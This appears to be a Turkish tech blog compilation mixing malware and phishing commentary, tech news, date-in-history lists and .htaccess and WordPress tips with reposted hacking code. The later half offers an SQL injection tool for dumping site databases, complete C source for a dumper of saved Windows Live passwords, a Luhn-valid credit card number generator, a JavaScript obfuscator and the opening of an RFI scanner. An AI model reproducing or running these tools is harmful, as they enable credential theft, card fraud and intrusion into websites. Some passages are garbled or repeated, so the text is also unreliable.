Hackerlar sıkıldı mı?

Eski günleri hatırlıyorum da, bin bir kurnazlıkla yazılmış virüs ve solucanlara karşı yine bin bir cambazlıkla mücadele verir dururduk. Sürekli antivirüs yazılımları kurup, kaldırır hangisinin daha iyi olduğuna karar vermeye çabalardık. O dönemlerde zararlı yazılımlar belli başlı taşıyıcılar kullanırlardı; ya bir imaj dosyası ya bir ses dosyası ya da herhangi bir e-posta eki... "I love you" ya da "Çernobil" virüslerini hatırlamayanınız yokftır herhalde. Peki, ne değişti? Neden şimdi bu kadar meşhur virüs ya da solucana sahip değiliz?

Şimdi, virüs meraklısı olduğumu ya da çöken bilgisayarlardan zevk aldığımı düşünebilirsiniz ama anlatmak istediğim arük devrin değiştiğine işaret etmek. Yani öncelerden internete bakış açımız farklıydı, internet bir iletişim ya da paylaşım ağı olmaya uzakü ya da bize öyle geliyordu. Çünkü tanıyalım tanımayalım gelen her e-postayı açar ya da arkadaş listelerimize iletirdik. Yani zararlıları farkına varamadan biz kendi elimizle dağıtırdık. Bu noktada zararlı beyinlere bir virüs yazıp, dağıtmamız için ortalığa bırakmak yetiyordu. Ancak o dönemlerde maddi kazanç uğruna yapılmazdı saldırılar...

Geçenlerde Hakin9 dergisinin (kendisi hack ve güvenlik dergisidir, http://www.en.hakin9.org/ adresinden ulaşabilirsiniz) bir sayısını okurken bu eski günler geldi aklıma ve durup düşündüğümde virüs, trojan ya da spy yazılımlarının evrimine katkıda bulunduğumuzu fark ettim. Nasıl mı? İnterneti daha çok ve farklı şekillerde kullanarak... Önceleri hacker'lar verdikleri zararlardan herhangi bir kazanç elde etmiyorlardı. Üstelik sistemlerini çökerttikleri ya da verilerini buharlaşürdıkları bilinçsiz kullanıcılar da aldıkları dersle daha bilinçli olmayı öğreniyorlardı. Bir başka deyişle bilinçli olmaya zor bir yoldan öğreniyorlardı diyebilirim. Ama zamanla e-ticaretin doğup gelişmesi, bizim de bunu sevmemiz üzerine zararlı beyinler (ki bu adamlar zararlı oldukları kadar da zekidir) farklı bir gelir modeli geliştirdiler, açık avı ve para transferleri. Zaman içinde önüne bankacılık tutkumuz ve alışveriş doymazlığımızı kullanmak için truva atlarını, keylogger'ları ve arka kapıları kullanmayı düşündüler. Sonuçsa felakete eşdeğerdi.

Kayıp bilgiler, çalınan kredi kartı bilgileri ve boşalan banka hesapları ardı ardına haber kuşaklarında yerlerini almaya başladılar. Bunu bir başka "masum" sektör körükledi; pazarlama. Evet, spam e-pos-talardan almayanımız yoktur herhalde. Bu e-posta bilgileri hep hacker'ların elinden belli başlı alıcılara satılıyor. Ancak engellenemiyor. Çünkü biz kullanıcılar önemsemiyoruz. Üstelik bakir e-posta adreslerinin de fiyatları çok yüksek. Ama pazarlamacıları (dolayısıyla hacker'ların) yeni gözdesi cep telefonları. Yani yakın bir gelecekte spam sms'lerimizin haddi hesabı olmayacak gibi görünüyor. Uzun lafın kısası zararlı beyinlerin bize sundukları sadece bizim yeni alışkanlıklarımızdan esinlenerek ortaya koydukları yeni fikirleri. Onları besleyen bizleriz ve internetin alanını genişleterek de uyguladıkları yöntemlere yenilerini eklemeye devam edeceğiz. En son ve en çok zarar veren phishing bu kurnazca yöntemlerden biri.

Online güvenlik ve koyunları saymak (?)

Phishing belki de beni en çok korkutan son dönem saldırılarının başında geliyor. Çünkü sonucunu kestirmek neredeyse imkansıza yakın. Daha doğrusu ne bankalann aldıkları güvenlik önlemlerinden ne de phishing'i engelleyebildiğim iddia eden güvenlik yazılımlarından emin olamıyorum. Geçenlerde aldığım bir haber oldukça ilginç geldi. Trojan.Silent-banker adlı yeni nesil bir truva aü dünya üzerindeki 400'den fazla bankayı tehdit ediyor. Üstelik çalışma manüğı gerçekten çok ileri düzey, özel güvenlik düzeyinde çalışan online şube işlemlerinde, sistem daha şifreli veri gönderimine geçmeden sisteme sızıp, para transferlerinin yönünü değiştirebiliyor.

Symantec firmasının duyurusuna göre loveie.info, web-counterstat.info, microcbs.com, reserva-za.com, screensaversfor-fun.com, mystabcounter.info ve 85.255.119.218 adreslerinden gelen her şey bu yeni truva atını bulaşürmaya çalışıyor. Yani dikkati elden bırakmamak, uyumamak gerek.

Biraz geç de olsa 2007 raporuna bakalım

2007'nin güvenlik karnesine bakmak gibi bir niyetim yoktu esasında ancak yukarıda bahsettiğim banka solucanı RSS okuyucumda belirdiğinde dönüp bakmam gerekti tabii. Çünkü bu yeni nesil truva atının etkilemesi tahmin edilen ülkelerin listesi uzayıp gitse de ilk 10'da Türkiye de bulunuyor, hem de 6. sırada... Umarım bankalar güvenlik raporlarını takip ediyorlardır da bu zararlıdan etkilenmezler. Peki, 2007'de neler olmuş? BitDefender laboratuarlarından gelen raporlara göre mal-ware adlı yeni nesil veri hırsızı yazılımlar yüzde 29'luk payla liderliğe oynamışlar. Bu durum 2008'de de devam ederse güvenlik çözümlerimizi geliştirmemiz gerekecek gibi.

KDE 4.0 huzurlarınızda

Uzun zamandır söyleyip durduğum, zaman zaman ekran görüntülerine yer verdiğim masaüstü yöneticisi KDE 4.0, en sonunda beta sürecini tamamlayıp, kullanıma alınamaz. Bu haber önemli, çünkü artık KDE farklı amaçlar güdüyor. Zira 4. sürümüne gelmiş bir yazılım yeni statüsüne de alınamaz. Bu haber önemli, çünkü artık KDE farklı amaçlar güdüyor. Önceleri Windows kullanıcılarının Linux tarafına geçtiklerinde zorlanmayacakları bir ortamla karşılaşmaları için düşünülmüş bir masaüstü yöneticisi olan KDE, 4. sürümü ile bu amaçları bir tarafa bırakıp yepyeni bir kullanım mantığı getiriyor.

Artık bir işlemi gerçekleştirmek için çok daha az tıklama yapıp çok daha az fare ile oynayacağız. Daha da önemlisi internet ve çoklu ortam uygulamaları masaüstünün hemen her bileşenine eklenebilecek, dağılabilecek. Bunların yanı sıra daha fazla makyaj barındıran KDE 4.0, sadece Linux değil, bilgisayar dünyasının daha önce görmediği bir görsellik ve kullanım manüğı getiriyor.

Ancak bu özellikler biraz göreceli. Yani hala compiz fusion ve Gnome kullanmaya devam edecek kullanıcılar da olacak. Çünkü KDE 4.0 bir nebzeden bir fazla sistem kaynağı tüketiyor. Bu hızda giderse, 4.1 ve üzeri sürümlerde Vista'yı yakalayabilir.

Tüm bunlar bir yana KDE 4.0'ın en büyük bombası BSD, Solaris ve Linux'un yanı sıra Windows ve Mac OS üzerinde de çalışabiliyor. Yani artık bu masaüstü yöneticisini Windows XP ya da Vista üzerinde kullanabileceğiz. Önceki sürümleri de Cygwin aracılığıyla XP altında çalıştırabiliyordum ancak sıklıkla hata mesajlarıyla karşılaşıyordum. Şimdi KDE Windows ve Mac OS'a doğal destek verdiğine göre birçok şey değişeceğe benziyor.

Dünyanın en hızlı işlemcisi hazır

Intel, şimdiye kadarki "en gelişmiş" masaüstü işlemci olan Core i7 işlemciyi tanıttı.

Intel’den yapılan açıklamaya göre, talep üzerine performansı artıran ve veri akış hızını maksimuma çıkaran yeni teknolojileri ile en özel işlemci olan Core i7, Nehalem işlemci ailesinin de ilk üyesi. Core i7, harcanan gücü artırmaksızın, video ve oyun performansları ile İnternet ve bilgisayar aktivitelerinin hızlarını yüzde 40;a varan oranda yükseltiyor.

Bilgisayar endüstrisi tarafından teknik bir "mucize" olarak gösterilen Intel Core i7, bir işlemcinin hızını ölçmek için bir dizi görevin uygulandığı SPECint_base_rate2006** testinde 117 puan elde ederek, yaygın olarak kabul gören bilgisayar testlerinde "rekor" kırdı.

Şimdiye kadar yapılan testlerde ilk kez tek bir işlemci 100 puan sınırını aştı.

Vista çekirdeğinde hata!

Vista'nın çekirdek kodunda bulunan bir hata, bilgisayarın çökmesine ya da dışarıdan çökertilmesine yol açıyor.

Avusturyalı bilgisayar güvenlik uzmanı Thomas Uterleitner, Windows Vista'nın çekirdeğinde bir başka hata buldu. İşletim sisteminin girişi/çıkış alt sisteminde bulunan hata, iphlpapi.dll arabirimine gönderilen bazı komutlar, arabellek taşmasına yol açabiliyor. Böylece çekirdek belleği bozuluyor ve o meşum mavi ekranla karşılaşıyoruz.

Unterleitner, bu hatanın "hizmet reddi" saldırılarıyla kötüye kullanılabileceğini, böylece bilgisayarın güvenliğinin tehdit altına gireceğini belirtti. Unterleitner ayrıca hatayı ekim ayında Microsoft'a belirttiğini, şirketin hatadan haberdar olduğunu, ancak kötüye kullanılabileceğinin bilinmediğini, bir sonraki hizmet pakedi (Service Pack) güncellemesine kadar da onarılmayacağını söyledi.

30 Kasım

1840. Napoleon Bonaparte 'ın cesedi St. Helene adasından Paris'e getirildi.

1925. Millet Meclisi kürsüsünün arkasına "Hakimiyet Milletindir" levhası asıldı.

Aynı gün Meclis'te tekke ve zaviyeler ile türbelerin kapatılmasına ilişkin kanun ve salahiyetsiz sarık ve ruhani kıyafet taşıyanların cezalandırılmasına ilişkin kanun kabul edildi.

1930. Cumhuriyet gazetesi "Ses Kraliçesi" yarışması düzenledi. Yarışmayı Hudadat Şakir Hanım kazandı.

1931. İktisadi Buhran Vergisi Kanunu, kabul edildi.

1939. Macar Devrimi'nin önderi Bela Kun Ukrayna'da kurşuna dizildi.

1948. Alman Komünist Partisi, Berlin'in Sovyetlere ait bölümünde şehir hükümeti oluşturdu.

1967. Güney Yemen Halk Cumhuriyeti kuruldu.

1979. Kurumlaşmış Irk Ayrımcılığı Suçunun Önlenmesi ve Cezalandırılması Uluslararası Sözleşmesi kabul edildi. Türkiye sözleşmeyi henüz onaylamadı.

1987. Demokratik Sol Parti lideri Bülent Ecevit ve eşi Rahşan Ecevit faal siyasetten çekildiklerini açıkladılar.

1988. Tek tip elbise giyilmesine karşı cezaevlerinde yapılan açlık grevleri beş cezaevinde anlaşmaya varılması üzerine sona erdi.

1990. Zonguldak maden işçileri greve çıktılar. 48 bin işçinin grevi çeşitli siyasi partiler, meslek kuruluşları ve kitle örgütlerinin desteğiyle başladı. Zonguldaklılar ilk günden itibaren greve aktif bir şekilde katıldılar.

1999. Avrupa İnsan Hakları Mahkemesi PKK lideri Abdullah Öcalan için verilen idam cezasına ihtiyati tedbir kararı aldı. Mahkeme, Strasbourg'daki yargılama sonuçlanana kadar infazın ertelenmesini istedi.




Bugün Doğanlar:

1667. "Gulliver'in Seyahatleri"nin yazarı Jonathan Swift İrlanda'da.

1835. "Tom Sawyer'in Maceraları"nın yazarı Mark Twain Amerika'da.

1874. 20 yüzyılın en önemli İngiliz'i kabul edilen Winston Churchill doğdular.


Bugün Ölenler:

1900. İrlanda doğumlu oyun yazarı Oscar Wilde.

1982. Tiyatro eleştirmeni Günay Akarsu.

Klasör Erişimini Engellemek

Apache sunucusu üzerindeki sitelerimizde .htaccess dosyasında yapacağımız ufak değişiklik ile klasörlerimizi gizli tutup erişimi engelleyeceğiz.

Eğer tüm dosyalarımıza erişimi engellemek için oluşturduğmuz .htaccess dosyasına;

~~~~~~~~~~~~~~~~~~~~

1. #deny all access
2. deny from all

~~~~~~~~~~~~~~~~~~~~

bu kodu yazdığınız takdirde klasörlere erişim engellenecektir.

Aynı şekilde bu işlemi belirli bir ip veya ip aralığı için yapmak isterseniz;

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. #deny all access
2. deny from all
3. allow from 85.101.22.45 # sadece tek ip adresi
4. allow from 85.101.22.12/80 # arası ip adresi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ayrıca tek klasör içni yapmak isterseniz;

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. Order allow,deny
3. Deny from all

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Şeklinde yapabilirsiniz.

Programlama Dilinizin Uzantısını Gizlemek

Yaz çiz karala...

Tüm dosyalarınızın uzantısını .htaccess dosyasına bir komut ekleyerek değiştirebilir ve kullandığınız programlama dilini gizleyebilirsiniz.Bu sayede ziyaretçilerinize güzel bir sürpriz hazırlamış olursunuz.Bu her zaman dikkat çekici ve güvenlik açısındanda yararlı bir işlemdir.Aşağıdaki örnek ile bunu pekiştirip kendi sitelerinize uyarlayabilirsiniz.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. # Make PHP code look like unknown types
   
2. AddType application/x-httpd-php .web
   

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bu .htaccess komutu ile dosyalarımızın uzantısını .php ‘den .web ‘e çevirdik.

WordPress Blogunuzun Link Uzantısını Değiştirmek

Yaz çiz karala....

Blogunuzu kurduktan sonra üzerinde basit ayarlamalarla optimizasyonunuzu dahada güçlendirebilirsiniz.Bunun için ilk olarak yapmanız gereken yazdığınız yazılarınızın link uzantısını arama motoruyla uyumlu hale getirmek.Yada size göre en uygunu hangisiyse ona göre ayarlamak.

En baştan bunu yaparken kullanacağınız kodları sırasıyla vermek istiyorum.Bunlar;

1. %postname% -> Konu ismi
2. 
   
3. %post_id% -> Post Numarası
4. 
   
5. %category% -> Kategori
6. 
   
7. %author% -> Yazar
8. 
   
9. %year% -> Yıl
10. 
    
11. %monthnum% -> Ay
12. 
    
13. %day% -> Gün

Yönetim panelinizden Tercihler -> Kalıcı Bağlantılar kısmına geldiğinizde aşağıda link seçenekleri çıkar.Orada hazır şablonlarda bulunmakta ama bizim kendi yapacağımız bir link olacağı için Özel seçeneğini seçeceğiz.

Seçtiğimiz özel alana buradan istediğiniz gibi kodu girebilirsiniz.

Örnek;

1. /%category%/%postname%/

Şu şekilde oluşacaktır:

http://www.siteadi.com/saglik/abur-cubur-yemek-sagliga-zararli/

Bunu kendi istediğiniz gibi düzeltebilirsiniz.

Bunu yaptıktan sonra aşağıda bir kod oluşacaktır.Bu kodu eğer .htaccess dosyası yazılabilir değilse dosyaya yazmanız gereklidir.

php de şifreli sayfa [Sanal Klavyesi de mevcuttur]

< ?
$sql = "select username,password from $tablo_adi where id=1";
$sql_query = mysql_query($sql);
$sql_data = mysql_fetch_object($sql_query);

$username=$sql_data->username; $password=$sql_data->password;

$LOGIN_INFORMATION=array($username => $password);
define('USE_USERNAME', false);
if(isset($_GET['logout'])) { setcookie("verify", ''); header("Location: index.php"); }
if(!function_exists('showLoginPasswordProtect')) {
function showLoginPasswordProtect($error_msg) {
echo '


'.$error_msg.'
';
if (USE_USERNAME)
?>

Kullanıcı Adı :
Şifre :

Şifrenizi Sanal Klavye ile Yazınız

die();
}
}
if (isset($_POST['access_password'])) {
$login=isset($_POST['access_login']) ? $_POST['access_login'] : '';
$pass=$_POST['access_password'];
if (!USE_USERNAME && !in_array($pass, $LOGIN_INFORMATION) || (USE_USERNAME && ( !array_key_exists($login, $LOGIN_INFORMATION) ||
$LOGIN_INFORMATION[$login] != $pass ))){
showLoginPasswordProtect("Kullanıcı adı veya parola yanlış. Lütfen yeniden deneyiniz.");
} else {
setcookie("verify", md5($pass));
}
} else {
if (!isset($_COOKIE['verify'])) { showLoginPasswordProtect(""); }
$found=false;
foreach($LOGIN_INFORMATION as $kay=>$val) {
if ($_COOKIE['verify'] == md5($val)) {
$found=true;
break;
}
}
if (!$found) {showLoginPasswordProtect("");}
}
?>
// Hatasız çalışması için tagının üzerinden include ediniz...

// Kod alıntıdır ve üzerine ekleme yapılmıştır...

Alıntı : http://www.pehepe.org

tr0yan0.blogspot.com

http://www.pehepe.org/kaynak-101.html

29 Kasım

1929. Amerikalı amiral Richard Byrd Güney Kutbu üzerinde uçan ilk insan oldu.

1934. Eski adların değiştirilmesi devam ediyor. Atatürk, Matbuat Cemiyeti'nin adını Basın Kurumu olarak değiştirildi.

1935. Paşabahçe Şişe ve Cam Fabrikası hizmete açıldı.

1937. Hatay'da özerk yönetim ilan edildi. Türklerin kutlama töreni yapması engellendi.

1938. Dr. Lütfi Kırdar İstanbul vali ve belediye başkanlığına atandı.

1944. Arnavutluk Halk Cumhuriyeti kuruldu.

1945. Yugoslavya federal cumhuriyet kuruldu.

1947. Birleşmiş Milletler Örgütü Araplar'ın şiddetli muhalefetine karşın Filistin'in bölünmesini ve bağımsız bir İsrail devleti kurulmasını kararlaştırdı.

Aynı gün Cyrano de Bergerac İstanbul Şehir Tiyatrosu'nda ilk kez sahnelendi.

1950. Gazetecilik Enstitüsü açıldı.

1960. Yassıada yargılamaları sürüyor. "Radyo Davası" başladı. Eski Demokrat Partililer devlet radyosunu parti yayın organı haline getirmekle suçlanıyor.

1964. Adalet Partisi 2. Büyük Kongresi yapıldı. Genel başkanlığa Süleyman Demirel seçildi.

1971. Türkiye Halk Kurtuluş Partisi ve Cephesi, THKP-C liderlerinden Mahir Çayan, Ziya Yılmaz ve Ulaş Bardakçı ile Türkiye Halk Kurtuluş Ordusu (THKO) liderlerinden Cihan Alptekin ve Ömer Ayna İstanbul Kartal- Maltepe Askeri Cezaevi'nden kaçtılar.

1972. Şair Can Yücel, Jean Paul Sartre'ın "Küba'da Sosyalizm ve İnsan" kitabını çevirdiği için verilen 7,5 yıl hapis cezasını çekmek için cezaevine girdi.

1974. Pakistan'da deprem; 4700 kişi öldü.

1975. Uluslararası Para Fonu, IMF Türkiye'den yabancı bankalara kolaylık sağlamasını istedi.

1977. Halkın Tapınağı tarikatı üyesi 913 kişi Guyana ormanlarında hep birlikte intihar ettiler.

1987. Erken genel seçimlerinde Anavatan Partisi (ANAP) 292 milletvekiliyle ikinci kez tek başına iktidar oldu. Sosyaldemokrat Halkçı Parti (SHP) 99 milletvekili, Doğru Yol Partisi (DYP) 59 milletvekili çıkardı. Demokratik Sol Parti (DSP), Milliyetçi Çalışma Partisi (MÇP), Refah Partisi (RP), Islahatçı Demokrasi Partisi (IDP) yüzde10'luk barajı aşamadı. Bülent Ecevit, Alparslan Türkeş, Necmettin Erbakan parlamento dışında kaldılar.

1990. Anayasa Mahkemesi, Medeni Yasa'nın159. maddesini eşitlik ilkesine aykırılıktan iptal etti.159. madde kadının çalışmasını koca iznine bağlıyordu.

1993. İstanbul Park Otel'in fazla katlarının yıkımına başlandı. Semt sakinleri ve meslek odalarının hukuk mücadelesi 9 yıl sürmüştü.

1996. Uluslararası Savaş Suçluları Mahkemesi'nde,1200 Boşnak'ın öldürülmesine karışan Hırvat asker10 yıl hapis cezasına mahkûm oldu.



Bugün Doğanlar:

1787. İtalyan besteci Gaetano Donizetti.

1932. Fransa cumhurbaşkanı Jacques Chirac.


Bugün Ölenler:

1846.Türk Musiki üstatlarından Hamamîzade İsmail Dede Efendi.

1924. İtalyan besteci Giacomo Puccini.

1932. Batıcılık akımının önde gelen isimlerinden Dr. Abdullah Cevdet.

1980. Cumhuriyet Halk Partisi eski genel sekreteri Orhan Eyüboğlu.

1985.Yassıada duruşmalarının başsavcısı Altay Ömer Egesel.

SQL Exploiter Pro v2.15

The Attacker:

The attcker gets the tables, columns and their data from CFM, ASP and PHP sites.

The Database:

The database saves all hacked sites and you can easily access the hacked sites whenever you need them. Hidden some of the website in the picture. Cann't give real shops for free, hahahahahhaaaaa.... :lol:

The Syntax Error Hack:

The Syntax error is the most difficult and time consuming type of hack. it is very easy with SQL Exploiter Pro v2.15.

The MYSQL and PHP Hack:

SQL Exploiter Pro v2.15 is great with MYSQL and PHP hacking. Can get tables and columns of MySQL version 5.

download : sql exploiter pro 2.15 download : sql exploiter pro 2.30

MSN Password Dumper

/***************************************************************************

* MSN Live Explorer v1.0 *

* *

* Copyright (C) 2007 by evilsocket *

* *

* http://www.evilsocket.net/ *

* *

* thanks to : *

* *

* Indeed to Microsoft for it's crappy security systems ! U.U *

* Master_18 for beta testing ;) *

* Massimiliano Montoro for Cain&Abel, it was fun reversing it ! :P *

* *

* This program is free software; you can redistribute it and/or modify *

* it under the terms of the GNU General Public License as published by *

* the Free Software Foundation; either version 2 of the License, or *

* (at your option) any later version. *

* *

* This program is distributed in the hope that it will be useful, *

* but WITHOUT ANY WARRANTY; without even the implied warranty of *

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *

* GNU General Public License for more details. *

* *

* You should have received a copy of the GNU General Public License *

* along with this program; if not, write to the *

* Free Software Foundation, Inc., *

* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *

* *

***************************************************************************/



include

include



typedef unsigned int uint_t;

typedef unsigned char byte_t;



/* Win32 CREDENTIAL_ATTRIBUTE (wincred.h) */

typedef struct{

char * Keyword;

uint_t Flags;

uint_t ValueSize;

byte_t * Value;

}

cred_attribute_t;



/* Win32 CREDENTIAL (wincred.h) */

typedef struct{

uint_t Flags;

uint_t Type;

char * TargetName;

char * Comment;

FILETIME LastWritten;

uint_t CredentialBlobSize;

byte_t * CredentialBlob;

uint_t Persist;

uint_t AttributeCount;

cred_attribute_t * Attributes;

char * TargetAlias;

char * UserName;

}

credential_t;



/* Tipi puntatori alle funzioni CredEnumerateA e CredFree di advapi32.dll */

typedef bool (WINAPI * credenumerate_t )(const char *, uint_t, uint_t *, credential_t ***);

typedef void (WINAPI * credfree_t )(void *);



/* Piccolo handler degli errori, nn mi andava di riscrivere 200 volte FreeLibrary XD */

int free_and_die( HMODULE hMod, const char *msg )

{

printf( "%s", msg );

if(hMod){

FreeLibrary(hMod);

}

return -1;

}



int main(int argc, char *argv[])

{

HMODULE h_dll = NULL;

credenumerate_t p_credenumerate = NULL;

credfree_t p_credfree = NULL;



credential_t ** v_cred = NULL;



uint_t cred_count = 0, i = 0;





printf( "\n*---------------------------------------------------*\n" );

printf( "*-- MSN Live Explorer v1.0 --*\n" );

printf( "*-- Copyright (C) 2007 by evilsocket --*\n" );

printf( "*-- http://www.evilsocket.net --*\n" );

printf( "*---------------------------------------------------*\n\n" );



/* Carico un istanza a advapi32.dll */

if( !(h_dll = LoadLibrary("advapi32.dll")) ){

return free_and_die( 0, "@ Error loading advapi32.dll !\n" );

}



/* Estraggo i puntatori a CredEnumerateA e CredFree */

p_credenumerate = (credenumerate_t)GetProcAddress( h_dll, "CredEnumerateA" );

p_credfree = (credfree_t)GetProcAddress( h_dll, "CredFree" );



if( !p_credenumerate || !p_credfree ){

return free_and_die( h_dll, "@ Error loading CredEnumerateA or CredFree from advapi32.dll !\n" );

}



/* Enumero le credenziali impostando il filtro a 'WindowsLive:name=*' */

if( !p_credenumerate( "WindowsLive:name=*", 0, &cred_count, &v_cred ) ){

return free_and_die( h_dll, "@ Error during credentials enumeration !\n" );

}



/* Looppo per tutte le credenziali trovate e ne stampo il contenuto che mi interessa (ma va?) */

printf( "@ Found %d credential(s) :\n\n", cred_count );



for( i = 0; i < cred_count; i++ ){

printf( "\tUsername : %s\n", v_cred[i]->UserName );

printf( "\tPassword : %ws\n", v_cred[i]->CredentialBlob );

}



/* Libero il vettore delle credenziali */

p_credfree(v_cred);



/* Libero l'istanza a advapi32.dll */

FreeLibrary(h_dll);



return 0;

}


http://tr0yan0.blogspot.com

Creditcard Number Generator

1.
2.
/***************************************************************************
3.
* Copyleft (C) 2007 by evilsocket *
4.
* *
5.
* *
6.
* http://www.evilsocket.net/ *
7.
* *
8.
* This program is free software; you can redistribute it and/or modify *
9.
* it under the terms of the GNU General Public License as published by *
10.
* the Free Software Foundation; either version 2 of the License, or *
11.
* (at your option) any later version. *
12.
* *
13.
* This program is distributed in the hope that it will be useful, *
14.
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
15.
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
16.
* GNU General Public License for more details. *
17.
* *
18.
* You should have received a copy of the GNU General Public License *
19.
* along with this program; if not, write to the *
20.
* Free Software Foundation, Inc., *
21.
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
22.
***************************************************************************/
23.

24.
$VISA = array( "Visa", 16, array( "4539", "4556", "4916", "4532", "4929", "40240071", "4485", "4716", "4" ) );
25.
$MASTERCARD = array( "Mastercard", 16, array( "51", "52", "53", "54", "55" ) );
26.
$AM_EXPRESS = array( "American Express", 15, array( "34", "37" ) );
27.
$DISCOVER = array( "Discover", 16, array( "6011" ) );
28.
$DINERS = array( "Diners Club", 14, array( "300", "301", "302", "303", "36", "38" ) );
29.
$ENROUTE = array( "EnRoute", 15, array( "2014", "2149" ) );
30.
$JCB = array( "JCB", 16, array( "3088", "3096", "3112", "3158", "3337", "3528" ) );
31.
$VOYAGER = array( "Voyager", 15, array( "8699" ) );
32.

33.
$CARDS = array( $VISA, $MASTERCARD, $AM_EXPRESS, $DISCOVER, $DINERS, $ENROUTE, $JCB, $VOYAGER );
34.

35.
function cc_generate( $type, $number ){
36.
global $CARDS;
37.

38.
$card = $CARDS[ $type ];
39.
$name = $card[0];
40.
$length = $card[1];
41.

42.
print "$name:\n";
43.

44.
for( $i = 0; $i < $number; $i++ ){
45.
$prefix = $card[2][ array_rand($card[2]) ];
46.

47.
while ( strlen($prefix) < ($length - 1) ) {
48.
$prefix .= rand(0,9);
49.
}
50.

51.
$sum = $j = 0;
52.
$rev = strrev($prefix);
53.

54.
while ( $j < $length - 1 ){
55.
$odd = $rev[$j] * 2;
56.
$odd = ($odd > 9 ? $odd - 9 : $odd );
57.
$sum += $odd;
58.

59.
if( $j != ($length - 2) ){
60.
$sum += $rev[ $j + 1 ];
61.
}
62.
$j += 2;
63.
}
64.

65.
$prefix .= (( floor($sum/10) + 1) * 10 - $sum) % 10;
66.

67.
echo "\t$prefix\n";
68.
}
69.
}
70.

71.
function banner(){
72.
print "***********************************************\n" .
73.
"* Credit Card Generator *\n" .
74.
"* by evilsocket [http://www.evilsocket.net] *\n" .
75.
"***********************************************\n\n";
76.
}
77.

78.
function usage(){
79.
global $CARDS;
80.
print "Usage : php ccgen.php \n";
81.
print "\t\tAllowed types are :\n\n";
82.
for( $i = 0; $i < count($CARDS); $i++ ){
83.
print "\t\t\t[$i] " . $CARDS[$i][0] . "\n";
84.
}
85.
print "\n";
86.
}
87.

88.
banner();
89.

90.
$type = $argv[1];
91.
$num = $argv[2];
92.

93.
if( $argc < 2 || $type < 0 || $type > count($CARDS) - 1 ){
94.
usage();
95.
}
96.
else{
97.
cc_generate( $type, $num );
98.
}
99.

100.
?>


http://www.evilsocket.net/?action=nopaste&do=view&key=6280584

Javascript Evil Encoder

< ?php
#
/*
#
Javascript Evil Encoder
#
by evilsocket
#

#
http://www.evilsocket.net
#
evilsocket@gmail.com
#
*/
#

#
function banner(){
#
print "*-------------------------------------------------------*\n";
#
print "* Javascript Evil Encoder *\n";
#
print "* by evilsocket *\n";
#
print "* http://www.evilsocket.net *\n";
#
print "* evilsocket@gmail.com *\n";
#
print "*-------------------------------------------------------*\n\n";
#
}
#

#
function help(){
#
print "Usage :\n";
#
print "\tphp jsencode.php \n";
#
print "Example :\n";
#
print "\tphp jsencode.php page.html encoded_page.html\n\n";
#
}
#

#
function rand_char(){
#
$pattern = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM";
#
return $pattern[rand(0,strlen($pattern) - 1)];
#
}
#

#
// file_put_contents for PHP <= 4
#
if( function_exists('file_put_contents') == false ){
#
function file_put_contents($n, $d, $flag = false) {
#
$f = @fopen($n, 'w');
#
if ($f === false) {
#
return 0;
#
} else {
#
if (is_array($d)) $d = implode($d);
#
$bytes_written = fwrite($f, $d);
#
fclose($f);
#
return $bytes_written;
#
}
#
}
#
}
#

#
function get_jscript( $html ){
#
preg_match_all( "/\(.*)\<\/script\>/i", $html, $matches );
#

#
return $matches[1][0];
#
}
#

#
function encode_jscript( $js ){
#
$len = strlen($js);
#
$buffer = "";
#
$vars = array();
#

#
for( $i = 0; $i < $len; $i++ ){
#
$var = rand_char()."$i";
#
$vars[] = $var;
#

#
$buffer .= "var $var=\"" . ($js[$i] == "\"" ? "\\\"" : $js[$i]) . "\";";
#
}
#

#
$buffer .= "eval(";
#
for( $i = 0; $i < $len; $i++ ){
#
$buffer .= $vars[$i] . ($i < ($len - 1) ? "+" : "");
#
}
#
$buffer .= ");";
#

#
return $buffer;
#
}
#

#
function encode_file( $src, $dst ){
#
$html = file_get_contents($src);
#
$html = str_replace( "\n", "", $html );
#
$html = str_replace( "\r", "", $html );
#

#
$js = get_jscript( $html );
#
$ejs = encode_jscript( $js );
#

#
file_put_contents( $dst, str_replace( $js, $ejs, $html ) );
#
}
#

#
banner();
#

#
if( $argc < 3 ){
#
help();
#
}
#
else{
#
encode_file( $argv[1], $argv[2] );
#
}
#

#

?>




http://www.evilsocket.net/?action=nopaste&do=view&key=1157198

CPlot - C++ function plotter

1.
/**
2.
* CPlot
3.
* Simple function plotter in C++ that allows you to plot a one-variable function on a 2D graph
4.
* simply by passing its equation (in x variable) via argv. It was written using
5.
*
6.
* --> CImg library - For image manipulation
7.
* http://cimg.sourceforge.net
8.
* --> ExprParser library - For math expressions parsing and solving
9.
* http://blacklight.gotdns.org/cgi-bin/nopaste.pl?mode=view&id=1219044900
10.
*
11.
* To compile it after installing these two libraries:
12.
* g++ -o cplot cplot.cpp -lm -lpthread -lX11 -lexprparser
13.
*
14.
* To use it:
15.
* ./cplot "function_to_plot"
16.
*
17.
* Example:
18.
* ./cplot "e^(0.1*x)"
19.
*
20.
* copyleft 2008 by BlackLight
21.
* Released under GNU GPL licence v.3
22.
*/
23.

24.
#include
25.
#include

RFİ Scanner

< ?php
/***************************************************************************
* PHP Evil RFI Scanner v1.2 *
* *
* Copyright (C) 2007 by evilsocket *
* *
* http://www.evilsocket.net *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
